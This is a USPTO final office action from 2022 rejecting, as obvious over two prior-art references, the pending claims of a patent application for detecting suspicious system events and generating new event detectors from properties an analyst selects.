Notice of Pre-AIA  or AIA  Status
The present application, filed on or after March 16, 2013, is being examined under the first inventor to file provisions of the AIA .
1.This is a Final Office Action in response to applicant’s amendment filed on December 16, 2021. At this time, claims 4-5, 7-8, 10 and 15 have been cancelled. Claims 1, 9, 13 and 16-18 have been amended. Therefore, claims 1-3, 6, 9, 11-14 and 16-20 are pending and addressed below. 
                                                    Response to Amendments 
As to Claims 1-3, 6, 9, 11-14 and 16-20, Applicants’ amendment of independent Claims 1, 13 and 18 with newly added feature “ sending, to a client device, a plurality of properties associated with the  first system, including one or more: event properties associated with the suspicious system event, 
properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed 
on a user interface comprising a plurality of user interface elements corresponding to the plurality of 
properties; receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements; “ [Claims 1-3, 6, 9, 11-14 and 16-20 ] has necessitated a new ground(s) of rejection in this Office action.  Therefore, Applicants’ arguments filed on 12/16/2021 have been fully considered but are moot in view of the new ground(s) of rejection because the arguments do not apply to any of the updated reference(s) being used in the current rejection.   
 Claim Rejections - 35 USC § 103
The following is a quotation of 35 U.S.C. 103 which forms the basis for all obviousness rejections set forth in this Office action:
A patent for a claimed invention may not be obtained, notwithstanding that the claimed invention is not identically disclosed as set forth in section 102, if the differences between the claimed invention and the prior art are such that the claimed invention as a whole would have been obvious before the effective filing date of the claimed invention to a person having ordinary skill in the art to which the claimed invention pertains. Patentability shall not be negated by the manner in which the invention was made.

Claims 1-3, 6, 9, 11-14, and 16-20 are rejected under 35 U.S.C 103 as being unpatentable over Milazzo, US pat. No 20200186569 in view of  Thomas US pat.No 10129290.  

Claims 1, 13, 18. The combination of Milazzo and Thomas discloses a method, performed by one or more processors, (See abstract; The cognitive computing system processes the natural language content from the one or more corpora and the security event log data to identify attack characteristics applicable to the security event log data.) comprising: 
receiving a plurality of system event records; (See   [0070]; input data 114 from electronic content sources 102 external to the monitored computing environment 104)
processing the plurality of system event records using a set of event detectors to determine that a suspicious system event associated with a first system has occurred; (See   [0072 ]; That is, the knowledge extracted by the cognitive computing system 112 from external sources 114 may be combined with information extracted from internal sources 116 to identify attack characteristic 120 which may then be used along with  specific customer/client information and/or monitored computing environment information to identify that particular security events detected in the monitored computing environment are actual attacks or threats)
generating one or more new event detectors based on the selected one or more properties; (See [ 0032    ]; a SIEM rule generator of the SIEM rules management system generates a new SIEM rules specifying the attack characteristics extracted from the ingested information)
and adding the one or more new event detectors to the set of event detectors. (See [0032]; the automatically generated SIEM rule generated by the SIEM may be stored in a SIEM rule repository)
Milazzo does not appear to explicitly disclose sending, to a client device, a plurality of properties associated with   the first system, including one or more: event properties associated with the suspicious system event, 
properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed 
on a user interface comprising a plurality of user interface elements corresponding to the plurality of 
properties; 
receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements; 

properties of the first system, or vulnerability properties, wherein the plurality of properties are displayed 
on a user interface comprising a plurality of user interface elements corresponding to the plurality of 
properties; (See Thomas, Col 22, lines 45-50; the security alert may indicate an internal attack (i.e, event properties) that originates from inside the enterprise 708, for example, from a desktop 724. In other instances, the security alert may indicate an external attack (i.e, event properties) that originates from outside the enterprise 708, for example, from the Internet 704. Operation 1308 may be executed following operation 1304. See col 25, lines 33-39; if one or more icons turn red, then the analyst knows there are negative findings on the IP/URL in question (i.e, properties), then when the analyst hovers over the icon he/she will see more summary information appear, like the name of the source of the negative finding within a particular category (i.e, properties). When the analyst then clicks on/selects the icon, they will be taken to a full report of the information (i.e, properties). see col 2, lines 45-55; further respond to the security threat by initiating at least one mapped preplanned response, the mapped preplanned response corresponding to a selection made by network security personal. see also col 4, lines 19-30; display a plurality of network security element icons in a network security map; display a plurality of cyber-security countermeasure icons in the network security map; receive user input that correlates at least one of the network security elements icons (i.e, event properties) with at least one of the cyber-security countermeasure icons; see fig 14, a plurality of display panel) 
receiving, from the client device, a selection indicator indicating a selected one or more properties of the plurality of properties by user input of one or more user interface elements; (See  Col 22, lines 33-39; In one embodiment, the reporting component 112 displays a graphical user interface with at least one icon that represents an identified source of the cyber-attack, receives user input that selects the at least one icon, and display at least a portion of the expanded data set responsive to the user input. Expanded data sets are discussed in more detail in connection with FIGS. 13 and 14.)
Milazzo and Thomas are analogous art because they are from the same field of endeavor which is intrusion detection. It would have been obvious to a person of ordinary skill in the art at the time the invention was made to modify the invention of Milazzo with the teaching of Thomas to include the 
Claim 9. The combination of Milazzo and Thomas discloses the method of claim 1, wherein the vulnerability properties indicate  one or more known security vulnerabilities of the  first system on which the suspicious system event occurred. (See [0070-0071] and [0048 ])Claim 11. The combination of Milazzo and Thomas discloses the method of claim 1, comprising: 
receiving a second plurality of system event records; (See [0070]; event from external data 114 and internal data 114) 
and determining a second one or more system event records of the second plurality of system event records to be indicative of an occurrence of a second suspicious system event based on the one or more new event detectors. (See [0070])  
 Claim 12. The combination of Milazzo and Thomas discloses the method of claim 11, further comprising sending a plurality of properties associated with the second suspicious system event to the client device. 
Claim 16. The combination of Milazzo and Thomas discloses the computing system of claim 13, wherein the vulnerability properties indicate one or more known security vulnerabilities of the first system on which the suspicious system event occurred; ((See Thomas, Col 22, lines 45-50; the security alert may indicate an internal attack that originates from inside the enterprise 708, for example, from a desktop 724. In other instances, the security alert may indicate an external attack that originates from outside the enterprise 708, for example, from the Internet 704. Operation 1308 may be executed following operation 1304)

Claim 17.  The combination of Milazzo and Thomas discloses the computing system of claim 13, wherein the operations further comprise: receiving, from the server, a plurality of properties associated with a second suspicious system event, wherein the server has determined that the second suspicious system event has occurred based on one or more new event detectors, (See, [0020], [0032], [0070], [0074])    
and displaying the plurality of properties associated with the second suspicious system event. (See Thomas, col 4, lines 19-30; display a plurality of network security element icons in a network security map; display a plurality of cyber-security countermeasure icons in the network security map; receive user input that correlates at least one of the network security elements icons with at least one of the cyber-security countermeasure icons; see fig 14, a plurality of display panel)
Milazzo and Thomas are analogous art because they are from the same field of endeavor which is intrusion detection. It would have been obvious to a person of ordinary skill in the art at the time the invention was made to modify the invention of Milazzo with the teaching of Thomas to include the displays panels because it would have allowed to enforce policy updates to perimeter defense assets to block threat actors from causing further damage. (See Thomas, col 1, lines 65-66 )  
Claim19. The combination of Milazzo and Thomas discloses the computer readable medium of claim 18, wherein the plurality of system event records comprise system log records. (See [0008 ]; and security event log data from a monitored computing environment.)Claim 20. The combination of Milazzo and Thomas discloses the computer readable medium of claim 18, wherein the plurality of system event records comprise records generated by a security monitoring application. (See [0008]; and security event log data from a monitored computing environment.) 
                                                               Conclusion
The prior art made of record and not relied upon is considered pertinent to applicant's disclosure.
Alkhatib, US pat.No 20210026952, title “ Method for detecting occurrence of suspicious system event.. “ . 
Applicant's amendment necessitated the new ground(s) of rejection presented in this Office action.  Accordingly, THIS ACTION IS MADE FINAL.  See MPEP § 706.07(a).  Applicant is reminded of the extension of time policy as set forth in 37 CFR 1.136(a).  
A shortened statutory period for reply to this final action is set to expire THREE MONTHS from the mailing date of this action.  In the event a first reply is filed within TWO MONTHS of the mailing date of this final action and the advisory action is not mailed until after the end of the THREE-MONTH shortened statutory period, then the shortened statutory period will expire on the date the advisory action is mailed, and any extension fee pursuant to 37 CFR 1.136(a) will be calculated from the mailing date of the advisory action.  In no event, however, will the statutory period for reply expire later than SIX MONTHS from the date of this final action. 
Any inquiry concerning this communication or earlier communications from the examiner should be directed to JOSNEL JEUDY whose telephone number is (571)270-7476.  The examiner can normally be reached on M-F 10:00-8:00.
Examiner interviews are available via telephone, in-person, and video conferencing using a USPTO supplied web-based collaboration tool. To schedule an interview, applicant is encouraged to use the USPTO Automated Interview Request (AIR) at http://www.uspto.gov/interviewpractice.

Information regarding the status of an application may be obtained from the Patent Application Information Retrieval (PAIR) system.  Status information for published applications may be obtained from either Private PAIR or Public PAIR.  Status information for unpublished applications is available through Private PAIR only.  For more information about the PAIR system, see https://ppair-my.uspto.gov/pair/PrivatePair. Should you have questions on access to the Private PAIR system, contact the Electronic Business Center (EBC) at 866-217-9197 (toll-free). If you would like assistance from a USPTO Customer Service Representative or access to the automated information system, call 800-786-9199 (IN USA OR CANADA) or 571-272-1000.

Date: 2/17/2022 




/JOSNEL JEUDY/Primary Examiner, Art Unit 2438